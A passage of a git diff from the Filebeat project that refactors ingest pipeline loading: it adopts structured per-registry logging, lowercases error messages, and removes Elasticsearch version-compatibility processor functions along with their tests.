reg, err := NewModuleRegistry(configs, beat.Info{Version: "5.2.0"}, true) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) // this should return an empty list, but no error inputs, err := reg.GetInputConfigs() - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 0, len(inputs)) } @@ -415,19 +417,19 @@ func TestInterpretError(t *testing.T) { { Test: "other plugin not installed", Input: `{"error":{"root_cause":[{"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}}],"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}},"status":400}`, - Output: "This module requires an Elasticsearch plugin that provides the hello_test processor. " + + Output: "this module requires an Elasticsearch plugin that provides the hello_test processor. " + "Please visit the Elasticsearch documentation for instructions on how to install this plugin. " + "Response body: " + `{"error":{"root_cause":[{"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}}],"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}},"status":400}`, }, { Test: "Elasticsearch 2.4", Input: `{"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, - Output: `The Ingest Node functionality seems to be missing from Elasticsearch. The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, + Output: `the Ingest Node functionality seems to be missing from Elasticsearch. The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, }, { Test: "Elasticsearch 1.7", Input: `{"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, - Output: `The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, + Output: `the Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, }, { Test: "bad json", diff --git a/filebeat/fileset/pipelines.go b/filebeat/fileset/pipelines.go index fe7eb86c884d..a3ce0b3de423 100644 --- a/filebeat/fileset/pipelines.go +++ b/filebeat/fileset/pipelines.go @@ -64,17 +64,17 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool for name, fileset := range filesets { // check that all the required Ingest Node plugins are available requiredProcessors := fileset.GetRequiredProcessors() - logp.Debug("modules", "Required processors: %s", requiredProcessors) + reg.log.Debugf("Required processors: %s", requiredProcessors) if len(requiredProcessors) > 0 { err := checkAvailableProcessors(esClient, requiredProcessors) if err != nil { - return fmt.Errorf("Error loading pipeline for fileset %s/%s: %v", module, name, err) + return fmt.Errorf("error loading pipeline for fileset %s/%s: %v", module, name, err) } } pipelines, err := fileset.GetPipelines(esClient.GetVersion()) if err != nil { - return fmt.Errorf("Error getting pipeline for fileset %s/%s: %v", module, name, err) + return fmt.Errorf("error getting pipeline for fileset %s/%s: %v", module, name, err) } // Filesets with multiple pipelines can only be supported by Elasticsearch >= 6.5.0 @@ -86,9 +86,9 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool var pipelineIDsLoaded []string for _, pipeline := range pipelines { - err = loadPipeline(esClient, pipeline.id, pipeline.contents, overwrite) + err = loadPipeline(esClient, pipeline.id, pipeline.contents, overwrite, reg.log.With("pipeline", pipeline.id)) if err != nil { - err = fmt.Errorf("Error loading pipeline for fileset %s/%s: %v", module, name, err) + err = fmt.Errorf("error loading pipeline for fileset %s/%s: %v", module, name, err) break } pipelineIDsLoaded = append(pipelineIDsLoaded, pipeline.id) @@ -112,69 +112,25 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool return nil } -func loadPipeline(esClient PipelineLoader, pipelineID string, content map[string]interface{}, overwrite bool) error { +func loadPipeline(esClient PipelineLoader, pipelineID string, content map[string]interface{}, overwrite bool, log *logp.Logger) error { path := makeIngestPipelinePath(pipelineID) if !overwrite { status, _, _ := esClient.Request("GET", path, "", nil, nil) if status == 200 { - logp.Debug("modules", "Pipeline %s already loaded", pipelineID) + log.Debug("Pipeline already exists in Elasticsearch.") return nil } } - err := setECSProcessors(esClient.GetVersion(), pipelineID, content) - if err != nil { - return fmt.Errorf("failed to adapt pipeline for ECS compatibility: %v", err) - } - - err = modifySetProcessor(esClient.GetVersion(), pipelineID, content) - if err != nil { - return fmt.Errorf("failed to modify set processor in pipeline: %v", err) - } - - if err := modifyAppendProcessor(esClient.GetVersion(), pipelineID, content); err != nil { - return fmt.Errorf("failed to modify append processor in pipeline: %v", err) + if err := adaptPipelineForCompatibility(esClient.GetVersion(), pipelineID, content, log); err != nil { + return fmt.Errorf("failed to adapt pipeline with backwards compatibility changes: %w", err) } body, err := esClient.LoadJSON(path, content) if err != nil { return interpretError(err, body) } - logp.Info("Elasticsearch pipeline with ID '%s' loaded", pipelineID) - return nil -} - -// setECSProcessors sets required ECS options in processors when filebeat version is >= 7.0.0 -// and ES is 6.7.X to ease migration to ECS. -func setECSProcessors(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - ecsVersion := common.MustNewVersion("7.0.0") - if !esVersion.LessThan(ecsVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - minUserAgentVersion := common.MustNewVersion("6.7.0") - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["user_agent"].(map[string]interface{}); ok { - if esVersion.LessThan(minUserAgentVersion) { - return fmt.Errorf("user_agent processor requires option 'ecs: true', but Elasticsearch %v does not support this option (Elasticsearch %v or newer is required)", esVersion, minUserAgentVersion) - } - logp.Debug("modules", "Setting 'ecs: true' option in user_agent processor for field '%v' in pipeline '%s'", options["field"], pipelineID) - options["ecs"] = true - } - } + log.Info("Elasticsearch pipeline loaded.") return nil } @@ -209,7 +165,7 @@ func interpretError(initialErr error, body []byte) error { } err1x := json.Unmarshal(body, &response1x) if err1x == nil && response1x.Error != "" { - return fmt.Errorf("The Filebeat modules require Elasticsearch >= 5.0. "+ + return fmt.Errorf("the Filebeat modules require Elasticsearch >= 5.0. "+ "This is the response I got from Elasticsearch: %s", body) } @@ -223,7 +179,7 @@ func interpretError(initialErr error, body []byte) error { strings.HasPrefix(response.Error.RootCause[0].Reason, "No processor type exists with name") && response.Error.RootCause[0].Header.ProcessorType != "" { - return fmt.Errorf("This module requires an Elasticsearch plugin that provides the %s processor. "+ + return fmt.Errorf("this module requires an Elasticsearch plugin that provides the %s processor. "+ "Please visit the Elasticsearch documentation for instructions on how to install this plugin. "+ "Response body: %s", response.Error.RootCause[0].Header.ProcessorType, body) @@ -234,134 +190,10 @@ func interpretError(initialErr error, body []byte) error { response.Error.RootCause[0].Type == "invalid_index_name_exception" && response.Error.RootCause[0].Index == "_ingest" { - return fmt.Errorf("The Ingest Node functionality seems to be missing from Elasticsearch. "+ + return fmt.Errorf("the Ingest Node functionality seems to be missing from Elasticsearch. "+ "The Filebeat modules require Elasticsearch >= 5.0. "+ "This is the response I got from Elasticsearch: %s", body) } return fmt.Errorf("couldn't load pipeline: %v. Response body: %s", initialErr, body) } - -// modifySetProcessor replaces ignore_empty_value option with an if statement -// so ES less than 7.9 will still work -func modifySetProcessor(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - flagVersion := common.MustNewVersion("7.9.0") - if !esVersion.LessThan(flagVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["set"].(map[string]interface{}); ok { - _, ok := options["ignore_empty_value"].(bool) - if !ok { - // don't have ignore_empty_value nothing to do - continue - } - - logp.Debug("modules", "In pipeline %q removing unsupported 'ignore_empty_value' in set processor", pipelineID) - delete(options, "ignore_empty_value") - - _, ok = options["if"].(string) - if ok { - // assume if check is sufficient - continue - } - val, ok := options["value"].(string) - if !ok { - continue - } - - newIf := strings.TrimLeft(val, "{ ") - newIf = strings.TrimRight(newIf, "} ") - newIf = strings.ReplaceAll(newIf, ".", "?.") - newIf = "ctx?." + newIf + " != null" - - logp.Debug("modules", "In pipeline %q adding if %s to replace 'ignore_empty_value' in set processor", pipelineID, newIf) - options["if"] = newIf - } - } - return nil -} - -// modifyAppendProcessor replaces allow_duplicates option with an if statement -// so ES less than 7.10 will still work -func modifyAppendProcessor(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - flagVersion := common.MustNewVersion("7.10.0") - if !esVersion.LessThan(flagVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["append"].(map[string]interface{}); ok { - allow, ok := options["allow_duplicates"].(bool) - if !ok { - // don't have allow_duplicates, nothing to do - continue - } - - logp.Debug("modules", "In pipeline %q removing unsupported 'allow_duplicates' in append processor", pipelineID) - delete(options, "allow_duplicates") - if allow { - // it was set to true, nothing else to do after removing the option - continue - } - - currIf, _ := options["if"].(string) - if strings.Contains(strings.ToLower(currIf), "contains") { - // if it has a contains statement, we assume it is checking for duplicates already - continue - } - field, ok := options["field"].(string) - if !ok { - continue - } - val, ok := options["value"].(string) - if !ok { - continue - } - - field = strings.ReplaceAll(field, ".", "?.") - - val = strings.TrimLeft(val, "{ ") - val = strings.TrimRight(val, "} ") - val = strings.ReplaceAll(val, ".", "?.") - - if currIf == "" { - // if there is not a previous if we add a value sanity check - currIf = fmt.Sprintf("ctx?.%s != null", val) - } - - newIf := fmt.Sprintf("%s && ((ctx?.%s instanceof List && !ctx?.%s.contains(ctx?.%s)) || ctx?.%s != ctx?.%s)", currIf, field, field, val, field, val) - - logp.Debug("modules", "In pipeline %q adding if %s to replace 'allow_duplicates: false' in append processor", pipelineID, newIf) - options["if"] = newIf - } - } - return nil -} diff --git a/filebeat/fileset/pipelines_test.go b/filebeat/fileset/pipelines_test.go index 7c617034f107..04d48c67f019 100644 --- a/filebeat/fileset/pipelines_test.go +++ b/filebeat/fileset/pipelines_test.go @@ -25,10 +25,11 @@ import ( "testing" "time" - "github.com/elastic/beats/v7/libbeat/common" - "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" - "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" + "github.com/elastic/beats/v7/libbeat/logp" ) func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { @@ -81,6 +82,7 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { "fls": testFileset, }, }, + log: logp.NewLogger(logName), } testESServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -92,10 +94,10 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { URL: testESServer.URL, Timeout: 90 * time.Second, }) - assert.NoError(t, err) + require.NoError(t, err) err = testESClient.Connect() - assert.NoError(t, err) + require.NoError(t, err) err = testRegistry.LoadPipelines(testESClient, false) if test.isErrExpected { @@ -106,491 +108,3 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { }) } } - -func TestSetEcsProcessors(t *testing.T) { - cases := []struct { - name string - esVersion *common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 6.7.0", - esVersion: common.MustNewVersion("6.6.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }}, - isErrExpected: true, - }, - { - name: "ES == 6.7.0", - esVersion: common.MustNewVersion("6.7.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - "ecs": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES >= 7.0.0", - esVersion: common.MustNewVersion("7.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := setECSProcessors(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content) - } - }) - } -} - -func TestModifySetProcessor(t *testing.T) { - cases := []struct { - name string - esVersion *common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 7.9.0", - esVersion: common.MustNewVersion("7.8.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES == 7.9.0", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES > 7.9.0", - esVersion: common.MustNewVersion("8.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "existing if", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": true, - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ignore_empty_value is false", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "ignore_empty_value": false, - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "value": "{{panw.panos.ruleset}}", - "if": "ctx?.panw?.panos?.ruleset != null", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "no value", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - "ignore_empty_value": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "set": map[string]interface{}{ - "field": "rule.name", - }, - }, - }}, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := modifySetProcessor(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content, test.name) - } - }) - } -} - -func TestModifyAppendProcessor(t *testing.T) { - cases := []struct { - name string - esVersion *common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 7.10.0: set to true", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": true, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: set to false", - esVersion: common.MustNewVersion("7.9.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES == 7.10.0", - esVersion: common.MustNewVersion("7.10.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES > 7.10.0", - esVersion: common.MustNewVersion("8.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: existing if", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - "if": "ctx?.host?.hostname != null", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: existing if with contains", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "allow_duplicates": false, - "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "value": "{{host.hostname}}", - "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", - }, - }, - }}, - isErrExpected: false, - }, - { - name: "ES < 7.10.0: no value", - esVersion: common.MustNewVersion("7.7.7"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - "allow_duplicates": false, - }, - }, - }}, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "append": map[string]interface{}{ - "field": "related.hosts", - }, - }, - }}, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := modifyAppendProcessor(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content, test.name) - } - }) - } -} diff --git a/filebeat/fileset/setup.go b/filebeat/fileset/setup.go index b76cf2719662..c90916fbac9d 100644 --- a/filebeat/fileset/setup.go +++ b/filebeat/fileset/setup.go @@ -21,7 +21,6 @@ import ( "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/cfgfile" "github.com/elastic/beats/v7/libbeat/common" - "github.com/elastic/beats/v7/libbeat/logp" pubpipeline "github.com/elastic/beats/v7/libbeat/publisher/pipeline" ) @@ -69,20 +68,20 @@ type SetupCfgRunner struct { // Start loads module pipelines for configured modules. func (sr *SetupCfgRunner) Start() { - logp.Debug("fileset", "Loading ingest pipelines for modules from modules.d") + sr.moduleRegistry.log.Debug("Loading ingest pipelines for modules from modules.d") pipelineLoader, err := sr.pipelineLoaderFactory() if err != nil { - logp.Err("Error loading pipeline: %+v", err) + sr.moduleRegistry.log.Errorf("Error loading pipeline: %+v", err) return } err = sr.moduleRegistry.LoadPipelines(pipelineLoader, sr.overwritePipelines) if err != nil { - logp.Err("Error loading pipeline: %s", err) + sr.moduleRegistry.log.Errorf("Error loading pipeline: %s", err) } } -// Stopp of SetupCfgRunner. +// Stop of SetupCfgRunner. func (sr *SetupCfgRunner) Stop() {} // String returns information on the Runner diff --git a/filebeat/include/fields.go b/filebeat/include/fields.go index fc47070e6e2e..5d99d5a7ede9 100644 --- a/filebeat/include/fields.go +++ b/filebeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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